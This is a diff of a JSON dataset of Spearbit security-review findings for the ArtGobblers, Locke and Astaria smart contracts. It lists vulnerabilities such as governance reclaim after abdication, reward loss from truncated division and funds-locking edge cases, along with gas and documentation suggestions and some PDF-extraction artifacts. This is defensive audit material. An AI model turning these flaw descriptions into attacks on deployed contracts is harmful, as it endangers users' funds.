"title": "Neither GobblersERC1155B nor ArtGobblers implement the ERC-165 supportsInterface function", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", - "body": "From the EIP-1155 documentation: Smart contracts implementing the ERC-1155 standard MUST implement all of the functions in the ERC1155 interface. Smart contracts implementing the ERC-1155 standard MUST implement the ERC- 165 supportsInterface function and MUST return the constant value true if 0xd9b67a26 is passed through the interfaceID argument. Neither GobblersERC1155B nor ArtGobblers are actually implementing the ERC-165 supportsInterface function. implementing the required ERC-165 supportsInterface function in the", + "title": "setNewGuardian can be changed to a 2 or 3 step transfer of authority process", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The current guardian might pass a wrong _guardian parameter to setNewGuardian which can break the upgradability of the AstariaRouter using fileGuardian.", "labels": [ "Spearbit", - "ArtGobblers", - "Severity: Informational" + "Astaria", + "Severity: Low Risk" ] }, { - "title": "LogisticVRGDA is importing wadExp from SignedWadMath but never uses it", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", - "body": "The LogisticVRGDA is importing the wadExp function from the SignedWadMath library but is never used.", + "title": "There are no range/value checks when some parameters get fileed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "There are no range/value checks when some parameters get fileed. For example: There are no hardcoded range checks for the ...Numerators and ...Denominators, so that the protocol's users can trustlessly assume the authorized users would not push these values into ranges seemed unac- ceptable. When an address get updated, we don't check whether the value provided is address(0) or not.", "labels": [ "Spearbit", - "ArtGobblers", - "Severity: Informational" + "Astaria", + "Severity: Low Risk" ] - }, - { - "title": "Pages.tokenURI does not revert when pageId is the ID of an invalid or not minted token", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", - "body": "The current implementation of tokenURI in Pages is returning an empty string if the pageId specified by the user's input has not been minted yet (pageId > currentId). Additionally, the function does not correctly handle the case of a special tokenId equal to 0, which is an invalid token ID given that the first mintable token would be the one with ID equal to 1. The EIP-721 documentation specifies that the contract should revert in this case: Throws if _tokenId is not a valid NFT. URIs are defined in RFC 3986.", + }, + { + "title": "Manually constructed storage slots can be chosen so that the pre-image of the hash is unknown", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "In the codebase, some storage slots are manually constructed using keccak256 hash of a string xyz.astaria. .... The pre-images of these hashes are known. This can allow in future for actors to find a potential path to those storage slots using the keccak256 hash function in the codebase and some crafted payload.", "labels": [ "Spearbit", - "ArtGobblers", - "Severity: Informational" + "Astaria", + "Severity: Low Risk" ] }, { - "title": "Consider checking if the token fed to the Gobbler is a real ERC1155 or ERC721 token", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", - "body": "The current implementation of ArtGobblers.feedArt function allows users to specify from the value of the bool isERC1155 input parameter if the id passed is from an ERC721 or ERC1155 type of token. Without checking if the passed nft address fully support ERC721 or ERC1155 these two problems could arise: The user can feed to a Gobbler an arbitrary ERC20 token by calling gobblers.feedArt(1, address(goo), 100, false);. In this example, we have fed 100 $GOO to the gobbler. By just implementing safeTransferFrom or transferFrom in a generic contract, the user can feed tokens that cannot later be rendered by a Dapp because they do not fully support ERC721 or ERC1155 standard.", + "title": "Avoid shadowing variables", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The highlighted line declares a new variable owner which has already been defined in Auth.sol inherited by LienToken: address owner = ownerOf(lienId);", "labels": [ "Spearbit", - "ArtGobblers", - "Severity: Informational" + "Astaria", + "Severity: Low Risk" ] }, { - "title": "Rounding down in legendary auction leads to legendaryGobblerPrice being zero earlier than the auction interval", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", - "body": "The expression below rounds down. startPrice * (LEGENDARY_AUCTION_INTERVAL - numMintedSinceStart)) / LEGENDARY_AUCTION_INTERVAL In particular, this expression has a value 0 when numMintedSinceStart is between 573 and 581 (LEGENDARY_- AUCTION_INTERVAL).", + "title": "PublicVault.accrue is manually inlined rather than called", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The _accrue function locks in the implied value of the PublicVault by calculating, then adding to yIntercept, and finally emitting an event. This calculation is duplicated in 3 separate locations in PublicVault: In totalAssets In _accrue And in updateVaultAfterLiquidation", "labels": [ "Spearbit", - "ArtGobblers", - "Severity: Informational" + "Astaria", + "Severity: Low Risk" ] }, { - "title": "Typos in code comments or natspec comments", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", - "body": "Below is a list of typos encountered in the code base and / or natspec comments: In both Pages.sol#L179 and Pages.sol#L188 replace compromise with comprise In Pages.sol#L205 replace pages's URI with page's URI In LogisticVRGDA.sol#L23 replace effects with affects In VRGDA.sol#L34 replace actions with auctions In ArtGobblers.sol#L54, ArtGobblers.sol#L745 and ArtGobblers.sol#L754 replace compromise with comprise In ArtGobblers.sol#L606 remove the double occurrence of the word state In ArtGobblers.sol#L871 replace emission's with emission In ArtGobblers.sol#L421 replace gobblers is minted with gobblers are minted and until all legen- daries been sold with until all legendaries have been sold In ArtGobblers.sol#L435-L436 replace gobblers where minted with gobblers were minted and if auc- tion has not yet started with if the auction has not yet started In ArtGobblers.sol#L518 replace overflow we've got bigger problems with overflow, we've got big- ger problems In ArtGobblers.sol#L775 and ArtGobblers.sol#L781 replace get emission emissionMultiple with get emissionMultiple", + "title": "CollateralToken.flashAction reverts with incorrect error", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Reverts with InvalidCollateralStates.AUCTION_ACTIVE when the address is not flashEnabled.", "labels": [ "Spearbit", - "ArtGobblers", - "Severity: Informational" + "Astaria", + "Severity: Low Risk" ] }, { - "title": "Missing natspec comments for contract's constructor, variables or functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", - "body": "Some of the contract's constructor variables and functions are missing natespec comments. Here is the full list of them: Pages constructor Pages getTargetSaleDay function LibString toString function MerkleProofLib verify function SignedWadMath toWadUnsafe function SignedWadMath unsafeWadMul function SignedWadMath unsafeWadDiv function SignedWadMath wadMul function SignedWadMath wadDiv function SignedWadMath wadExp function SignedWadMath wadLn function SignedWadMath unsafeDiv function VRGDA constructor LogisticVRGDA constructor LogisticVRGDA getTargetDayForNextSale PostSwitchVRGDA constructor PostSwitchVRGDA getTargetDayForNextSale GobblerReserve artGobblers GobblerReserve constructor GobblersERC1155B contract is missing natspec's coverage for most of the variables and functions PagesERC721 contract is missing natspec's coverage for most of the variables and functions PagesERC721 isApprovedForAll should explicity document the fact that the ArtGobbler contract is always pre-approved ArtGobblers chainlinkKeyHash variable ArtGobblers chainlinkFee variable ArtGobblers constructor ArtGobblers gobblerPrice miss the @return natspec ArtGobblers legendaryGobblerPrice miss the @return natspec ArtGobblers requestRandomSeed miss the @return natspec ArtGobblers fulfillRandomness miss both the @return and @param natspec ArtGobblers uri miss the @return natspec ArtGobblers gooBalance miss the @return natspec ArtGobblers mintReservedGobblers miss the @return natspec ArtGobblers getGobblerEmissionMultiple miss the @return natspec 11 ArtGobblers getUserEmissionMultiple miss the @return natspec ArtGobblers safeBatchTransferFrom miss all natspec ArtGobblers safeTransferFrom miss all natspec ArtGobblers transferUserEmissionMultiple miss @notice natspec", + "title": "AstariaRouter has unnecessary access to setPayee", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "LienToken.setPayee. setPayee is never called from AstariaRouter, but the router has access to call", "labels": [ "Spearbit", - "ArtGobblers", - "Severity: Informational" + "Astaria", + "Severity: Low Risk" ] }, { - "title": "Potential issues due to slippage when minting legendary gobblers", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", - "body": "The price of a legendary mint is a function of the number of gobblers minted from goo. Because of the strict check that the price is exactly equal to the number of gobblers supplied, this can lead to slippage issues. That is, if there is a transaction that gets mined in the same block as a legendary mint, and before the call to mintLegendaryGobbler, the legendary mint will revert. uint256 cost = legendaryGobblerPrice(); if (gobblerIds.length != cost) revert IncorrectGobblerAmount(cost);", + "title": "ClearingHouse can be deployed only when needed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "When collateral is deposited, a Clearing House is automatically deployed. However, these Clearing Houses are only needed if the collateral goes to auction at Seaport, either through liquidation or the collateral holder choosing to sell them. The Astaria team has indicated that this behavior is intentional in order to put the cost on the borrower, since liquidations are already expensive. I'd suggest the perspective that all pieces of collateral will be added to the system, but a much smaller percentage will ever be sent to Seaport. The aggregate gas spent will be much, much lower if we are careful to only deploy these contract as needed. Further, let's look at the two situations where we may need a Clearing House: 1) The collateral holder calls listForSaleOnSeaport(): In this case, the borrower is paying anyways, so it's a no brainer. 2) Another user calls liquidate(): In this case, they will earn the liquidation fees, which should be sufficient to justify a small increase in gas costs.", "labels": [ "Spearbit", - "ArtGobblers", - "Severity: Informational" + "Astaria", + "Severity: Gas Optimization" ] }, { - "title": "Users who claim early have an advantage in goo production", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", - "body": "The gobblers are revealed in ascending order of the index in revealGobblers. However, there can be cases when this favours users who were able to claim early: 1. There is the trivial case where a user who claimed a day earlier will have an advantage in gooBalance as their emission starts earlier. 2. For users who claimed the gobblers on the same day (in the same period between a reveal) the advantage depends on whether the gobblers are revealed in the same block or not. 1. If there is a large number of gobbler claims between two aforementioned gobblers, then it may not be possible to call revealGobblers, due to block gas limit. 2. A user at the beginning of the reveal queue may call revealGobblers for enough indices to reveal their gobbler early. In all of the above cases, the advantage is being early to start the emission of the Goo.", + "title": "PublicVault.claim() can be optimized", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "For claim not to revert we would need to have msg.sender == owner(). And so when the following is called: _mint(owner(), unclaimed); Instead of owner() we can use msg.sender since reading the immutable owner() requires some calldata lookup.", "labels": [ "Spearbit", - "ArtGobblers", - "Severity: Informational" + "Astaria", + "Severity: Gas Optimization" ] }, { - "title": "Add a negativity check for decayConstant in the constructor", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", - "body": "Price is designed to decay as time progresses. For this, it is important that the constant decayCon- stant is negative. Since the value is derived using an on-chain logarithm computation once, it is useful to check that the value is negative. Also, typically decay constant is positive, for example, in radioactive decay the negative sign is explicitly added in the function. It is worth keeping the same convention here, i.e., keep decayConstant as a positive number and add the negative sign in getPrice function. However, this may cause a small increase in gas and therefore may not be worth implementing in the end.", + "title": "Can remove incoming terms from LienActionBuyout struct", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Incoming terms are never used in the LienActionBuyout struct. The general flow right now is: incomingTerms are passed to VaultImplementation#buyoutLien. These incoming terms are validated and used to generate the lien information. The lien information is encoded into a LienActionBuyout struct. This is passed to LienToken#buyoutLien, but then the incoming terms are never used again.", "labels": [ "Spearbit", - "ArtGobblers", - "Severity: Informational" + "Astaria", + "Severity: Gas Optimization" ] }, { - "title": "Consideration on possible Chainlink integration concerns", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", - "body": "The ArtGobbler project relies on the Chainlink v1 VRF service to reveal minted gobblers and assign a random emissionMultiple that can range from 6 to 9. The project has estimated that minting and revealing all gobblers will take about 10 years. In the scenario simulated by the discussion \"Test to mint and reveal all the gobblers\" the number of requestRan- domSeed and fulfillRandomness made to reveal all the minted gobblers were more than 1500. Given the timespan of the project, the number of requests made to Chainlink to request a random number and the fundamental dependency that Chainlink VRF v1 has, we would like to highlight some concerns: What would happen if Chainlink completely discontinues the Chainlink VRF v1? At the current moment, Chainlink has already released VRF v2 that replaces and enhances VRF v1. What would happen in case of a Chainlink service outage and for some reason they decide not to pro- cess previous requests? Currently, the ArtGobbler contract does not allow to request a new \"request for randomness\". 13 What if the fulfillRandomness always gets delayed by a long number of days and users are not able to reveal their gobblers? This would not allow them to know the value of the gobbler (rarity and the visual representation) and start compounding $GOO given the fact that the gobbler does not have an emission multiple associated yet. What if for error or on purpose (malicious behavior) a Chainlink operator calls fulfillRandomness multi- ple times changing the randomSeed during a reveal phase (the reveal of X gobbler can happen in multiple stages)?", + "title": "Refactor updateVaultAfterLiquidation to save gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "In updateVaultAfterLiquidation, we check if we're within maxAuctionWindow of the end of the If we are, we call _deployWithdrawProxyIfNotDeployed and assign withdrawProxyIfNearBoundary to epoch. the result. We then proceed to check if withdrawProxyIfNearBoundary is assigned and, if it is, call handleNewLiquidation. Instead of checking separately, we can include this call within the block of code executed if we're within maxAuc- tionWindow of the end of the epoch. This is true because (a) withdraw proxy will always be deployed by the end of that block and (b) withdraw proxy will never be deployed if timeToEnd >= maxAuctionWindow.", "labels": [ "Spearbit", - "ArtGobblers", - "Severity: Informational" + "Astaria", + "Severity: Gas Optimization" ] }, { - "title": "The function toString() does not return a string aligned to a 32-byte word boundary", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", - "body": "It is a good practice to align memory regions to 32-byte word boundaries. This is not necessarily the case here. However, we do not think this can lead to issues.", + "title": "Use collateralId to set collateralIdToAuction mapping", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "_listUnderlyingOnSeaport() sets collateralIdToAuction mapping as follows: s.collateralIdToAuction[uint256(listingOrder.parameters.zoneHash)] = true; Since this function has access to collateralId, it can be used instead of using zoneHash.", "labels": [ "Spearbit", - "ArtGobblers", - "Severity: Informational" + "Astaria", + "Severity: Gas Optimization" ] }, { - "title": "Considerations on Legendary Gobbler price mechanics", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", - "body": "The auction price model is made in a way that starts from a startPrice and decays over time. Each time a new action starts the price time will be equal to max(69, prevStartPrice * 2). Users in this case are incentivized to buy the legendary gobbler as soon as the auction starts because by doing so they are going to burn the maximum amount allowed of gobblers, allowing them to maximize the final emission multiple of the minted legendary gobbler. By doing this, you reach the end goal of maximizing the account's $GOO emissions. By waiting, the cost price of the legendary gobbler decays, and it also decays the emission multiple (because you can burn fewer gobblers). This means that if a user has enough gobblers to burn, he/she will burn them as soon as the auction starts. Another reason to mint a legendary gobbler as soon as the auction starts (and so burn as many gobblers as possible) is to make the next auction starting price as high as possible (always for the same reason, to be able to maximize the legendary gobbler emissions multiple). The next auction starting price is determined by legendaryGobblerAuctionData.startPrice = uint120(cost < 35 ? 69 : cost << 1); These mechanisms and behaviors can result in the following consequences: Users that will have a huge number of gobblers will burn them as soon as possible, disallowing others that can't afford it to wait for the price to decay. There will be less and less \"normal\" gobblers available to be used as part of the \"art\" aspect of the project. In the discussion \"Test to mint and reveal all the gobblers\" we have simulated a scenario in which a whale would be interested to collect all gobblers with the end goal of maximizing $GOO production. In that scenario, when the last Legendary Gobbler is minted we have estimated that 9644 gobbler have been burned to mint all the legendaries. 14", + "title": "Storage packing", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "RouterStorage: The RouterStorage struct represents state managed in storage by the AstariaRouter contract. Some of the packing in this struct is sub optimal. 1. maxInterestRate and minInterestBPS: These two values pack into a single storage slot, however, are never referenced together outside of the constructor. This means, when read from storage, there are no gas efficiencies gained. 2. Comments denoting storage slots do not match implementation. The comment //slot 3 + for example occurs far after the 3rd slot begins as the addresses do not pack together. LienStorage: 3. The LienStorage struct packs maxLiens with the WETH address into a single storage slot. While gas is saved on the constructor, extra gas is spent in parsing maxLiens on each read as it is read alone. VaultData: 4. VaultData packs currentEpoch into the struct's first slot, however, it is more commonly read along with values from the struct's second slot.", "labels": [ "Spearbit", - "ArtGobblers", - "Severity: Informational" + "Astaria", + "Severity: Gas Optimization" ] }, { - "title": "Define a LEGENDARY_GOBBLER_INITIAL_START_PRICE constant to be used instead of hardcoded 69", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", - "body": "69 is currently the starting price of the first legendary auction and will also be the price of the next auction if the previous one (that just finished) was lower than 35. There isn't any gas benefit to use a constant variable but it would make the code cleaner and easier to read instead of having hard-coded values directly.", + "title": "ClearingHouse fallback can save WETH address to memory to save gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The fallback function reads WETH() from ROUTER three times. once and save to memory for the future calls.", "labels": [ "Spearbit", - "ArtGobblers", - "Severity: Informational" + "Astaria", + "Severity: Gas Optimization" ] }, { - "title": "Update ArtGobblers comments about some variable/functions to make them more clear", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", - "body": "Some comments about state variables or functions could be improved to make them clearer or remove any further doubts. LEGENDARY_AUCTION_INTERVAL /// @notice Legendary auctions begin each time a multiple of these many gobblers have been minted. It could make sense that this comment specifies \"minted from Goo\" otherwise someone could think that also the \"free\" mints (mintlist, legendary, reserved) could count to determine when a legendary auction start. EmissionData.lastTimestamp // Timestamp of last deposit or withdrawal. These comments should be updated to cover all the scenarios where lastBalance and lastTimestamp are up- dated. Currently, they are updated in many more cases for example: mintLegendaryGobbler revealGobblers transferUserEmissionMultiple getGobblerData[gobblerId].emissionMultiple = uint48(burnedMultipleTotal << 1) has an outdated comment. The current present in the mintLegendaryGobbler function has the following comment: line getGobblerData[gobblerId].emissionMultiple = uint48(burnedMultipleTotal << 1) // Must be done before minting as the transfer hook will update the user's emissionMultiple. In both ArtGobblers and GobblersERC1155B there isn't any transfer hook, which could mean that the referred comment is referencing outdated code. We suggest removing or updating the comment to reflect the current code implementation. legendaryGobblerPrice numMintedAtStart calculation. 15 The variable numMintedAtStart is calculated as (numSold + 1) * LEGENDARY_AUCTION_INTERVAL The comment above the formula does not explain why it uses (numSold + 1) instead of numSold. This reason is correctly explained by a comment on LEGENDARY_AUCTION_INTERVAL declaration. It would be better to also update the comment related to the calculation of numMintedAtStart to explain why the current formula use (numSold + 1) instead of just numSold transferUserEmissionMultiple The above utility function transfers an amount of a user's emission's multiple to another user. Other than transfer- ring that emission amount, it also updates both users lastBalance and lastTimestamp The natspec comment should be updated to cover this information.", + "title": "CollateralToken's onlyOwner modifier doesn't need to access storage", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The onlyOwner modifier calls to ownerOf(), which loads storage itself to check ownership. We can save a storage load since we don't need to load the storage variables in the modifier itself.", "labels": [ "Spearbit", - "ArtGobblers", - "Severity: Informational" + "Astaria", + "Severity: Gas Optimization" ] }, { - "title": "Mark functions not called internally as external to improve code quality", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", - "body": "The following functions could be declared as external to save gas and improve code quality: Goo.mintForGobblers Goo.burnForGobblers Goo.burnForPages GobblerReserve.withdraw", + "title": "Can stop loop early in _payDebt when everything is spent", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "When a loan is sold on Seaport and _payDebt is called, it loops through the auction stack and calls _paymentAH for each, decrementing the remaining payment as money is spent. This loop can be ended when payment == 0.", "labels": [ "Spearbit", - "ArtGobblers", - "Severity: Informational" + "Astaria", + "Severity: Gas Optimization" ] }, { - "title": "UnaccruedSeconds do not increase even if nobody is actively staking", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", - "body": "The unstreamed variable tracks whether someone is staking in the contract or not. However, because of the division precision loss at Locke.sol#L164-L166 and Locke.sol#L187, unstreamed > 0 may happen even when everyone has already withdrawn all deposited tokens from the contract, i.e. ts.token = 0 for everyone. Consider the following proof of concept with only two users, Alice and Bob: streamDuration = 8888 At t = startTime, Alice stakes 1052 wei of deposit tokens. At t = startTime + 99, Bob stakes 6733 wei of deposit tokens. At t = startTime + 36, both Alice and Bob exits from the contract. At this point Alices and Bobs ts.tokens are both 0 but unstreamed = 1 wei. The abovementined numbers are the resault of a fuzzing campaign and were not carefully crafted, therefore this issue can also occur under normal circumstances. function updateStreamInternal() internal { ... uint256 tdelta = timestamp - lastUpdate; if (tdelta > 0) { if (unstreamed == 0) { unaccruedSeconds += uint32(tdelta); } else { unstreamed -= uint112(tdelta * unstreamed / (endStream - lastUpdate)); } } ... }", + "title": "Can remove initializing allowList and depositCap for private vaults", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Private Vaults do not allow enabling, disabling, or editing the allow list, and don't enforce a deposit cap, so seems strange to initialize these variables. Delegates are still included in the _validateCommitment function, so we can't get rid of this entirely.", "labels": [ "Spearbit", - "Locke", - "Severity: High Risk" + "Astaria", + "Severity: Gas Optimization" ] }, { - "title": "Old governor can call acceptGov() after renouncing its role through _abdicate()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", - "body": "The __abdicate function does not reset pendingGov value to 0. Therefore, if a pending governor is set the user can become a governor by calling acceptGov.", + "title": "ISecurityHook.getState can be modified to return bytes32 / hash of the state instead of the state itself.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Since only the keccak256 of preTransferState is checked against the kec- cak256 hash of the returned security hook state, we could change the design so that ISecurityHook.getState returns bytes32 to save gas. Unless there is a plan to use the bytes memory preTransferState in some other form as well.", "labels": [ "Spearbit", - "Locke", - "Severity: High Risk" + "Astaria", + "Severity: Gas Optimization" ] }, { - "title": "User can lose their reward due truncated division", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", - "body": "The truncated division can cause users to lose rewards in this update round which may happen when any of the following conditions are true: 1. RewardToken.decimals() is too low. 2. Reward is updated too frequently. 3. StreamDuration is too large. 4. TotalVirtualBalance is too large (e.g., stake near the end of stream). This could potentially happen especially when the 1st case is true. Consider the following scenario: rewardToken.decimals() = 6. depositToken.decimals() can be any (assume its 18). rewardTokenAmount = 1K * 10**6. streamDuration = 1209600 (two weeks). totalVirtualBalance = streamDuration * depositTokenAmount / timeRemaining where depositToken- Amount = 100K 10**18 and timeRemaining = streamDuration (a user stakes 100K at the beginning of the stream) lastApplicableTime() - lastUpdate = 100 (about 7 block-time). Then rewards = 100 * 1000 * 10**6 * 10**18 / 1209600 / (1209600 * 100000 * 10**18 / 1209600) = 0.8267 < 1. User wants to buy the reward token at the price of 100K/1K = 100 deposit token but does not get any because of the truncated division. function rewardPerToken() public override view returns (uint256) { if (totalVirtualBalance == 0) { return cumulativeRewardPerToken; } else { // time*rewardTokensPerSecond*oneDepositToken / totalVirtualBalance uint256 rewards; unchecked { rewards = (uint256(lastApplicableTime() - lastUpdate) * rewardTokenAmount * ,! depositDecimalsOne) / streamDuration / totalVirtualBalance; } return cumulativeRewardPerToken + rewards; } }", + "title": "Define an endpoint for LienToken that only returns the liquidator", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "It would save a lot of gas if LienToken had an endpoint that would only return the liquidator for a collateralId, instead of all the auction data.", "labels": [ "Spearbit", - "Locke", - "Severity: High Risk" + "Astaria", + "Severity: Gas Optimization" ] }, { - "title": "The streamAmt check may prolong a user in the stream", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", - "body": "Assume that the amount of tokens staked by a user (ts.tokens) is low. This check allows another person to deposit a large stake in order to prolong the user in a stream (untilstreamAmt for the user becomes non-zero). For this duration the user would be receiving a bad rate or 0 altogether for the reward token while being unable to exit from the pool. if (streamAmt == 0) revert ZeroAmount(); Therefore, if Alice stakes a small amount of deposit token and Bob comes along and deposits a very large amount of deposit token, tts in Alices interest to exit the pool as early as possible especially when this is an indefinite stream. Otherwise the user would be receiving a bad rate for their deposit token.", + "title": "Setting uninitialized stack variables to their default value can be avoided.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Setting uninitialized stack variables to their default value adds extra gas overhead. T t = ;", "labels": [ "Spearbit", - "Locke", - "Severity: Medium Risk" + "Astaria", + "Severity: Gas Optimization" ] }, { - "title": "User can stake before the stream creator produced a funding stream", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", - "body": "Consider the following scenario: 1. Alice stakes in a stream before the stream starts. 2. Nobody funds the stream,. 3. In case of an indefinite stream Alice loses some of her deposit depending on when she exits the stream. For a usual stream Alice will have her deposit tokens locked until endDepositLock.", + "title": "Simplify / optimize for loops", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "In the codebase, sometimes there are for loops of the form: for (uint256 i = 0; ; i++) { } These for loops can be optimized.", "labels": [ "Spearbit", - "Locke", - "Severity: Medium Risk" + "Astaria", + "Severity: Gas Optimization" ] }, { - "title": "Potential funds locked due low token decimal and long stream duration", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", - "body": "In case where the deposit token decimal is too low (4 or less) or when the remaining stream duration is too long, checking streamAmt > 0 may affect regular users. They could be temporarily blocked by the contract, i.e. they cannot stake, withdraw, or get rewards, and should wait until streamAmt > 0 or the stream ends. Altough unlikely to happen it still is a potential lock of funds issue. 11 function updateStreamInternal() internal { ... if (acctTimeDelta > 0) { if (ts.tokens > 0) { uint112 streamAmt = uint112(uint256(acctTimeDelta) * ts.tokens / (endStream - ,! ts.lastUpdate)); if (streamAmt == 0) revert ZeroAmount(); ts.tokens -= streamAmt; } ... }", + "title": "calculateSlope can be more simplified", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "calculateSlope can be more simplified: owedAtEnd would be: owedAtEnd = amt + (tend (cid:0) tlast )r amt 1018 where: amt is stack.point.amount tend is stack.point.end tlast is stack.point.last r is stack.lien.details.rate and so the returned value would need to be r amt 1018.", "labels": [ "Spearbit", - "Locke", - "Severity: Medium Risk" + "Astaria", + "Severity: Gas Optimization" ] }, { - "title": "Sanity check on the reward tokens decimals", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", - "body": "Add sanity check on the reward tokens decimals, which shouldnt exceed 33 because Token- Stream.rewards has a uint112 type. constructor( ) { uint64 _streamId, address creator, bool _isIndefinite, address _rewardToken, address _depositToken, uint32 _startTime, uint32 _streamDuration, uint32 _depositLockDuration, uint32 _rewardLockDuration, uint16 _feePercent, bool _feeEnabled LockeERC20( _depositToken, _streamId, _startTime + _streamDuration + _depositLockDuration, _startTime + _streamDuration, _isIndefinite ) MinimallyExternallyGoverned(msg.sender) // inherit factory governance // No error code or msg to reduce bytecode size require(_rewardToken != _depositToken); // set fee info feePercent = _feePercent; feeEnabled = _feeEnabled; // limit feePercent require(feePercent < 10000); // store streamParams startTime = _startTime; streamDuration = _streamDuration; // set in shared state 12 endStream = startTime + streamDuration; endDepositLock = endStream + _depositLockDuration; endRewardLock = startTime + _rewardLockDuration; // set tokens depositToken = _depositToken; rewardToken = _rewardToken; // set streamId streamId = _streamId; // set indefinite info isIndefinite = _isIndefinite; streamCreator = creator; uint256 one = ERC20(depositToken).decimals(); if (one > 33) revert BadERC20Interaction(); depositDecimalsOne = uint112(10**one); // set lastUpdate to startTime to reduce codesize and first users gas lastUpdate = startTime; }", + "title": "Break out of _makePayment for loop early when totalCapitalAvailable reaches 0", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "In _makePayment we have the following for loop: for (uint256 i; i < n; ) { (newStack, spent) = _payment( s, stack, uint8(i), totalCapitalAvailable, address(msg.sender) ); totalCapitalAvailable -= spent; unchecked { ++i; } } When totalCapitalAvailable reaches 0 we still call _payment which costs a lot of gas and it is only used for transferring 0 assets, removing and adding the same slope for a lien owner if it is a public vault and other noops.", "labels": [ "Spearbit", - "Locke", - "Severity: Low Risk" + "Astaria", + "Severity: Gas Optimization" ] }, { - "title": "Use a stricter bound for transferability delay", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", - "body": "modifier transferabilityDelay { // ensure the time is after end stream if (block.timestamp < endStream) revert NotTransferableYet(); _; }", + "title": "_buyoutLien can be optimized by reusing payee", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "payee in _buyoutLien can be reused to save some gas", "labels": [ "Spearbit", - "Locke", - "Severity: Low Risk" + "Astaria", + "Severity: Gas Optimization" ] }, { - "title": "Potential issue with malicious stream creator", - "html_url": 